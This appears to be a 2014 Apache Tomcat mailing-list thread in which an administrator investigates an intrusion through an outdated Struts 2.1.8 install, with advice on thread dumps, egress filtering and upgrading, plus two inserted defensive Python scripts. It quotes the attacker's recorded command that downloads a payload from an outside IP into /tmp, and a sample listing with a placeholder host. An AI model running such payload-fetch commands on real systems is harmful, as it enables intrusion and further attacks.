Re: Regarding i think an intrusion - Solved =)

2014-06-04 Thread Leonardo Santagostini
Hello all.

We have internally closed the issue. So I can tell you: thanks a lot, you rock =)

Thanks for all your effort and time.

Kindly yours,
Leonardo

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-26 15:32 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:


Re: Regarding i think an intrusion

2014-05-26 Thread Leonardo Santagostini
Well well well. Thank you all so much!!!

Since the Struts upgrade I have had no intrusion on my servers =) =)

Thank you, list, for the support, for the time and for helping me with this issue.

Yours,
Leonardo


Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-20 12:45 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:


Re: Regarding i think an intrusion

2014-05-20 Thread Leonardo Santagostini
Hello all, again it's me =)

Just so you know, today we deployed our apps using Struts 2.3.16.2.

So from today I will monitor those servers very closely =)

Thanks to all of you. I will tell you how things go.

Regards,
Leonardo

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-07 12:28 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:


Re: Regarding i think an intrusion

2014-05-12 Thread Leonardo Santagostini
Hello all!

Developers are still estimating the effort for upgrading Struts; I
will let you know how things are going.

Thanks all for replying to me.

Regards,
Leonardo

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-05 15:39 GMT-03:00 Martin Gainty mgai...@hotmail.com:

  Subject: Re: Regarding i think an intrusion
  From: lsantagost...@gmail.com
  To: users@tomcat.apache.org
  
  Hello Chris, but this logfile was only one day.
 MG> Ay caramba!
  
  Maybe I had a concept mismatch trying to capture the exact moment when the
  execution begins.
  
  My command was
  
  while true; do
    CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l)
    if [ "$CUENTO" -gt 0 ]; then
      PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
      echo -e "Se encontro wget corriendo, sacando dump de JVM..."; kill -3 $PIDJAVA  # SIGQUIT: JVM writes a thread dump
    fi
    sleep 3
  done
  
  Maybe too many dumps all together, now I'm trying to get a live capture
  without luck =(
  
  If you know a better method, please let me know.
  
  Thanks for your effort, kind regards,
  Leonardo
  
  Saludos.-
  Leonardo Santagostini
 MG> Tomcat APR cannot use WebSockets with JDK 1.6 ... you need to use JDK 1.7 (now)
 MG> this:
 ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
    java.lang.Thread.State: TIMED_WAITING (sleeping)
  at java.lang.Thread.sleep(Native Method)
  at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
  at java.lang.Thread.run(Thread.java:662)
 MG> These informational log entries produce a LOT of noise
 MG> log4j.properties
 MG> log4j.logger.org.quartz=OFF  // (quiet, Quartz)

 MG> that one:
 ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000]
    java.lang.Thread.State: RUNNABLE
  at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
  at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
  at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
  at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
  at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
  at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
  at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168

Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Hello all, sorry for the delay, but I was on holiday from Wednesday.

Ok, I made a ticket for the developers to upgrade Struts. They told me that
they will work on that.

So, I will keep in touch with the news =)

Again, thanks all for all the support you give me.

Regards,
Leonardo

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-01 18:48 GMT-03:00 Christopher Schultz ch...@christopherschultz.net:


 Cédric,

 On 5/1/14, 10:00 AM, Cédric Couralet wrote:
  2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net:
 
  Leonardo,
 
  On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
  Im uploading mi logfiles so it will be available when
  finished uploading.
 
  Remember to get a thread dump while Runtime.exec() is running.
 
  You should copy the script /tmp/4.sh somewhere else so you have a
  copy in case the attacker tries to clean-up after themselves.
  That's certainly what's doing the evil work.
 
  You could probably set up iptables or something to restrict
  outgoing requests so that the attack can't progress across your
  network.
 
  Regarding the configuration, its working in two other sites
  without problem, and there is no problem putting L4 balancing
  with haproxy.
 
  I have asked developers about that exploit, still without
  answer.
 
  You appear to be using struts2 2.1.8, which is in the range of
  versions vulnerable to this bug. There is a workaround that you
  can probably apply:
  http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
  last section on this page).
 
  Of course, the vulnerability doesn't allow you to simply inject code
  or anything like that: you can certainly mess-around with code that
  is already available on the site, though.
 
 
  I think the S2-021 can be used to inject code. There is a POC
  circulating proving it. That said, this struts version (2.1.8) is
  also vulnerable to
  http://struts.apache.org/release/2.3.x/docs/s2-016.html which
  permits code execution very easily.

 Ouch. Yeah, there's always that ;)

 -chris

 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org




Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Well, the thread dump is here

https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing

Let me know if I'm missing something.

Thanks!

Leonardo

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-05 9:34 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com:






Re: Regarding i think an intrusion

2014-05-05 Thread Christopher Schultz

Leonardo,

On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
 Well thread dump is here
 
 https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing

Seems like it's broken.

-chris



Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Ok, it's uploaded again.

This is the link

https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing

Kind regards,

Leonardo




Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-05 11:57 GMT-03:00 Christopher Schultz ch...@christopherschultz.net:





Re: Regarding i think an intrusion

2014-05-05 Thread Christopher Schultz

Leonardo,

On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
 Ok, again its uploaded.
 
 This is the link
 
 https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing

1/2 GiB log file? Hrm.

It doesn't even have any calls to Runtime.exec in it. If you have a
snapshot of a thread dump (and only the thread dump, I don't need 3
weeks of your logs) that you took while the intrusion was taking
place, post that.

If you don't, then I think you're out of luck.

Sounds like a bad time to go on holiday.

-chris



Re: Regarding i think an intrusion

2014-05-05 Thread Leonardo Santagostini
Hello Chris, but this logfile was only one day.

Maybe I had a concept mismatch trying to capture the exact moment when the
execution begins.

My command was

while true; do
  CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l)
  if [ "$CUENTO" -gt 0 ]; then
    PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')
    echo -e "Se encontro wget corriendo, sacando dump de JVM..."; kill -3 $PIDJAVA  # SIGQUIT: JVM writes a thread dump
  fi
  sleep 3
done

Maybe too many dumps all together, now I'm trying to get a live capture
without luck =(

If you know a better method, please let me know.

Thanks for your effort, kind regards,
Leonardo


Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-05-05 13:06 GMT-03:00 Christopher Schultz ch...@christopherschultz.net:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256

 Leonardo,

 On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
  Ok, again its uploaded.
 
  This is the link
 
 
 https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing

 1/2
 
 GiB log file? Hrm.

 It doesn't even have any calls to Runtime.exec in it. If you have a
 snapshot of a thread dump (and only the thread dump, I don't need 3
 weeks of your logs) that you took while the intrusion was taking
 place, post that.

 If you don't, then I think you're out of luck.

 Sounds like a bad time to go on holiday.

 - -chris


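Leonardo's loop above keys on the name "wget", so it fires only once the downloader is already running and then dumps the JVM every three seconds. An added example, not code from this thread, that instead watches what Konstantin's pstree question is really about: a servlet container has no business having child processes at all, so any direct child of the JVM running Tomcat's Bootstrap class is the trigger, and the JVM is dumped once per new child. The `ps -eo` output below is constructed (pids and the download host are made up); TOMCAT_MAIN is Tomcat's real launcher class.

```python
#!/usr/bin/env python3
"""Dump the JVM's threads the moment the Tomcat JVM gains a child process.

Added example, not code from the mailing-list thread.  Instead of grepping
for "wget" this watches the direct children of the JVM running Tomcat's
Bootstrap class and sends SIGQUIT (what `kill -3` does) once per newly seen
child; the dump lands in catalina.out and the child's command line is
printed so the script it runs can be copied away before it is cleaned up.
"""
import os
import signal
import subprocess
import sys
import time
from typing import Dict, List, NamedTuple, Set, Tuple

# Tomcat's launcher class: a JVM whose command line names it is "Tomcat".
TOMCAT_MAIN = "org.apache.catalina.startup.Bootstrap"

class Proc(NamedTuple):
    pid: int
    ppid: int
    user: str
    args: str

def parse_ps(text: str) -> List[Proc]:
    """Parse `ps -eo pid,ppid,user,args` output; the header line is skipped."""
    procs = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[0].isdigit():
            procs.append(Proc(int(parts[0]), int(parts[1]), parts[2], parts[3]))
    return procs

def tomcat_pids(procs: List[Proc]) -> List[int]:
    """PIDs of JVMs running Tomcat (Bootstrap on the command line)."""
    return [p.pid for p in procs if "java" in p.args and TOMCAT_MAIN in p.args]

def suspicious_children(procs: List[Proc],
                        allow: Tuple[str, ...] = ()) -> Dict[int, List[Proc]]:
    """Map each Tomcat JVM pid to the chain of processes hanging off it.

    Direct children whose command line starts with an `allow` prefix (a CGI
    program the site really uses) are skipped with their descendants; all
    others are reported with their descendants, so the whole sh -> wget chain
    is visible.  Caveat: a child already reparented to init (ppid 1) is not
    seen here; the thread dump is then the only link back to the JVM.
    """
    by_ppid: Dict[int, List[Proc]] = {}
    for p in procs:
        by_ppid.setdefault(p.ppid, []).append(p)
    result: Dict[int, List[Proc]] = {}
    for jvm in tomcat_pids(procs):
        chain: List[Proc] = []
        queue = [c for c in by_ppid.get(jvm, []) if not c.args.startswith(allow)]
        while queue:
            child = queue.pop(0)
            chain.append(child)
            queue.extend(by_ppid.get(child.pid, []))
        if chain:
            result[jvm] = chain
    return result

def watch(interval: float = 3.0, allow: Tuple[str, ...] = (),
          once: bool = False) -> Dict[int, List[Proc]]:
    """Poll ps every `interval` seconds; dump each JVM once per new child."""
    seen: Set[int] = set()
    while True:
        ps_out = subprocess.run(["ps", "-eo", "pid,ppid,user,args"],
                                capture_output=True, text=True, check=True).stdout
        found = suspicious_children(parse_ps(ps_out), allow)
        for jvm, chain in found.items():
            new = [c for c in chain if c.pid not in seen]
            if not new:
                continue  # already dumped for these: no dump every 3 seconds
            for c in new:
                print(f"JVM {jvm}: child {c.pid} ({c.user}): {c.args}")
            os.kill(jvm, signal.SIGQUIT)  # thread dump goes to catalina.out
            seen.update(c.pid for c in new)
        if once:
            return found
        time.sleep(interval)

# Constructed `ps -eo pid,ppid,user,args` output shaped like the thread's
# `ps -fea` lines; pids and the download host are made up.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     init [3]
 8801     1 tomcat   /usr/java/default/bin/java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start
 8882  8801 tomcat   sh /tmp/4.sh
 8893  8882 tomcat   wget http://ATTACKER-HOST/squid32 -O /tmp/squid
 9100     1 root     /usr/bin/java -jar /opt/other/app.jar
 9150  9100 root     sh -c date
"""

if __name__ == "__main__":
    watch(once="--once" in sys.argv)
```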



RE: Regarding i think an intrusion

2014-05-05 Thread Martin Gainty
 Subject: Re: Regarding i think an intrusion
 From: lsantagost...@gmail.com
 To: users@tomcat.apache.org
 
 Hello Chris, but this logfile was only one day.
MG> Ay caramba!
 
 Maybe i had a concept mismatch trying to capture the exact moment when the
 execution begins.
 
 My command was
 
 while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
 java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget
 corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done
 
 Maybe too many dumps all togheter, now im trying to get a live capture
 without luck =(
 
 If you know a better method, please letme know it.
 
 Thanks for your effort, knid regards,
 Leonardo
 
 Saludos.-
 Leonardo Santagostini
MG> Tomcat APR cannot use WebSockets with JDK 1.6 ...you need to use JDK 1.7 (now)
MG> this
ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 
tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
 at java.lang.Thread.sleep(Native Method)
 at 
org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
 at java.lang.Thread.run(Thread.java:662)
MG> These informational log entries produce a LOT of noise
MG> log4j.properties
MG> log4j.logger.org.quartz=OFF  //(Shut up, Quartz)

MG> that
ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 
runnable [0x46f34000]
   java.lang.Thread.State: RUNNABLE
 at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
 at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern

Re: Regarding i think an intrusion

2014-05-01 Thread Cédric Couralet
2014-04-30 19:07 GMT+02:00 Christopher Schultz ch...@christopherschultz.net
:


 Leonardo,

 On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
  Im uploading mi logfiles so it will be available when finished
  uploading.

 Remember to get a thread dump while Runtime.exec() is running.

 You should copy the script /tmp/4.sh somewhere else so you have a copy
 in case the attacker tries to clean-up after themselves. That's
 certainly what's doing the evil work.

 You could probably set up iptables or something to restrict outgoing
 requests so that the attack can't progress across your network.

  Regarding the configuration, its working in two other sites
  without problem, and there is no problem putting L4 balancing with
  haproxy.
 
  I have asked developers about that exploit, still without answer.

 You appear to be using struts2 2.1.8, which is in the range of
 versions vulnerable to this bug. There is a workaround that you can
 probably apply:
 http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the last
 section on this page).

 Of course, the vulnerability doesn't allow you to simply inject code
 or anything like that: you can certainly mess-around with code that is
 already available on the site, though.


I think the S2-021 can be used to inject code. There is a POC circulating
proving it.
That said, this struts version (2.1.8) is also vulnerable to
http://struts.apache.org/release/2.3.x/docs/s2-016.html which permits code
execution very easily.



 -chris





Re: Regarding i think an intrusion

2014-05-01 Thread Christopher Schultz

Cédric,

On 5/1/14, 10:00 AM, Cédric Couralet wrote:
 2014-04-30 19:07 GMT+02:00 Christopher Schultz
 ch...@christopherschultz.net
 :
 
 Leonardo,
 
 On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
 Im uploading mi logfiles so it will be available when
 finished uploading.
 
 Remember to get a thread dump while Runtime.exec() is running.
 
 You should copy the script /tmp/4.sh somewhere else so you have a
 copy in case the attacker tries to clean-up after themselves.
 That's certainly what's doing the evil work.
 
 You could probably set up iptables or something to restrict
 outgoing requests so that the attack can't progress across your
 network.
 
 Regarding the configuration, its working in two other sites 
 without problem, and there is no problem putting L4 balancing
 with haproxy.
 
 I have asked developers about that exploit, still without
 answer.
 
 You appear to be using struts2 2.1.8, which is in the range of 
 versions vulnerable to this bug. There is a workaround that you
 can probably apply: 
 http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
 last section on this page).
 
 Of course, the vulnerability doesn't allow you to simply inject
 code
 or anything like that: you can certainly mess-around with code that
 is already available on the site, though.
 
 
 I think the S2-021 can be used to inject code. There is a POC
 circulating proving it. That said, this struts version (2.1.8) is
 also vulnerable to 
 http://struts.apache.org/release/2.3.x/docs/s2-016.html which
 permits code execution very easily.

Ouch. Yeah, there's always that ;)

-chris




Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz

Konstantin,

On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
 lsantagost...@gmail.com:
 Hello Dan,
 
 Nop, the attacker is executing locally the following
 
 tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh 
 tomcat8893  8882  0 Apr27 ?00:00:00 wget 
 http://218.199.102.59/.xy/squid32 -O /tmp/squid
 
 And the launch squid who tries to connect via ssh to varoius
 places.
 
 Right now its time to leave the office, but in a few hours i will
 paste in pastebin access logs, config files, wherever you tell
 me.
 
 This is my pstree
 
 [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
 init─┬─atd
      ├─java─┬─sh───wget
      │      └─263*[{java}]
 
 sh launched by tomcat's java?

Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.

 Take a thread dump: 
 https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

  It shall show what is stacktrace in thread that launched external
 process.

+1

The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.

A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.

-chris


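Konstantin and Chris both say the thread dump is the evidence that matters: the stack of the thread sitting in Runtime.exec() shows which code path (the CGI servlet, SSI, the application, or something like an expression evaluator being fed request data) launched the shell. An added example, not code from this thread, that pulls exactly that out of a `kill -3` / jstack dump: it finds threads with a process-launch frame and lists the non-JDK callers above it. The sample dump is constructed in the shape Martin posted; its thread ids, line numbers and the frames above Runtime.exec are made up to show the pattern, not taken from this incident.

```python
#!/usr/bin/env python3
"""Find the thread that launched an external process in a JVM thread dump.

Added example, not code from the mailing-list thread.  It parses the
`kill -3` / jstack format, picks the threads whose stack contains a
process-launch frame and lists the callers above it that are not JDK
plumbing, innermost first: that list answers "who called Runtime.exec()".
"""
import re
import sys
from dataclasses import dataclass, field
from typing import Dict, List

# Frames that mean "a process is being started" (JDK 6/7 names).
EXEC_FRAMES = ("java.lang.Runtime.exec", "java.lang.ProcessBuilder.start",
               "java.lang.ProcessImpl.", "java.lang.UNIXProcess.")
# Frames that only forward a call and say nothing about who made it.
PLUMBING = ("java.", "javax.", "sun.", "com.sun.", "jdk.")
_HEADER = re.compile(r'^"(?P<name>[^"]+)"')   # real dumps quote the thread name
_STATE = re.compile(r'^\s*java\.lang\.Thread\.State:\s*(\S+)')
_FRAME = re.compile(r'^\s*at\s+(\S+)\(')

@dataclass
class ThreadInfo:
    name: str
    state: str = ""
    frames: List[str] = field(default_factory=list)  # innermost first

def parse_thread_dump(text: str) -> List[ThreadInfo]:
    """Split a dump into threads, keeping each frame's qualified method name."""
    threads: List[ThreadInfo] = []
    for line in text.splitlines():
        h = _HEADER.match(line)
        if h:
            threads.append(ThreadInfo(h.group("name")))
        elif threads:  # ignore the preamble before the first thread
            s, f = _STATE.match(line), _FRAME.match(line)
            if s:
                threads[-1].state = s.group(1)
            elif f:
                threads[-1].frames.append(f.group(1))
    return threads

def exec_callers(thread: ThreadInfo) -> List[str]:
    """Non-JDK frames above the outermost process-launch frame, innermost first.

    Empty when the thread is not launching a process.  Reflection frames
    (sun.reflect.*, java.lang.reflect.*) count as plumbing, which is exactly
    what exposes an OGNL or other expression-language caller behind them.
    """
    launch = [i for i, fr in enumerate(thread.frames) if fr.startswith(EXEC_FRAMES)]
    if not launch:
        return []
    return [fr for fr in thread.frames[max(launch) + 1:]
            if not fr.startswith(PLUMBING)]

def find_exec_threads(text: str) -> Dict[str, List[str]]:
    """Thread name -> caller chain, for every thread that is launching a process."""
    hits: Dict[str, List[str]] = {}
    for t in parse_thread_dump(text):
        callers = exec_callers(t)
        if callers:
            hits[t.name] = callers
    return hits

# Constructed dump in the shape Martin posted.  Thread ids, line numbers and
# the frames above Runtime.exec are made up to show the pattern; the dump
# taken on the real server is the evidence, not this text.
SAMPLE_DUMP = '''\
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x1 nid=0x10 waiting on condition [0x1000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
    at java.lang.Thread.sleep(Native Method)
    at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
    at java.lang.Thread.run(Thread.java:662)

"ajp-bio-8009-exec-12" daemon prio=10 tid=0x2 nid=0x20 runnable [0x2000]
   java.lang.Thread.State: RUNNABLE
    at java.lang.UNIXProcess.forkAndExec(Native Method)
    at java.lang.UNIXProcess.<init>(UNIXProcess.java:53)
    at java.lang.ProcessBuilder.start(ProcessBuilder.java:453)
    at java.lang.Runtime.exec(Runtime.java:593)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
    at java.lang.reflect.Method.invoke(Method.java:597)
    at ognl.OgnlRuntime.invokeMethod(OgnlRuntime.java:100)
    at com.opensymphony.xwork2.interceptor.ParametersInterceptor.setParameters(ParametersInterceptor.java:100)
    at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:100)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:100)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:662)
'''

if __name__ == "__main__":
    # Usage: script.py [catalina.out]; without a file the constructed sample is used.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for name, callers in find_exec_threads(text).items():
        print(f'"{name}" is launching a process, called from:\n    ' + "\n    ".join(callers))
```

Run it over the whole catalina.out that received the `kill -3` dumps; every thread that was inside Runtime.exec() at any of those moments is listed with the frames that led there.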


Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Ok, i will do the following:

1) thread dump of running tomcat instance
2) Pastebin the running tomcat config

I think at mid day will have all the info.

Thanks all for replying me and all the responses.

Regards, Leonardo

Saludos.-
Leonardo Santagostini

http://ar.linkedin.com/in/santagostini





2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net
:


 Konstantin,

 On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
  2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
  lsantagost...@gmail.com:
  Hello Dan,
 
  Nop, the attacker is executing locally the following
 
  tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
  tomcat8893  8882  0 Apr27 ?00:00:00 wget
  http://218.199.102.59/.xy/squid32 -O /tmp/squid
 
  And the launch squid who tries to connect via ssh to varoius
  places.
 
  Right now its time to leave the office, but in a few hours i will
  paste in pastebin access logs, config files, wherever you tell
  me.
 
  This is my pstree
 
  [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
  ├─java─┬─sh───wget │  └─263*[{java}]
 
  sh launched by tomcat's java?

 Yes: please verify that it's the JVM running Tomcat, and not just any
 JVM process.

  Take a thread dump:
 
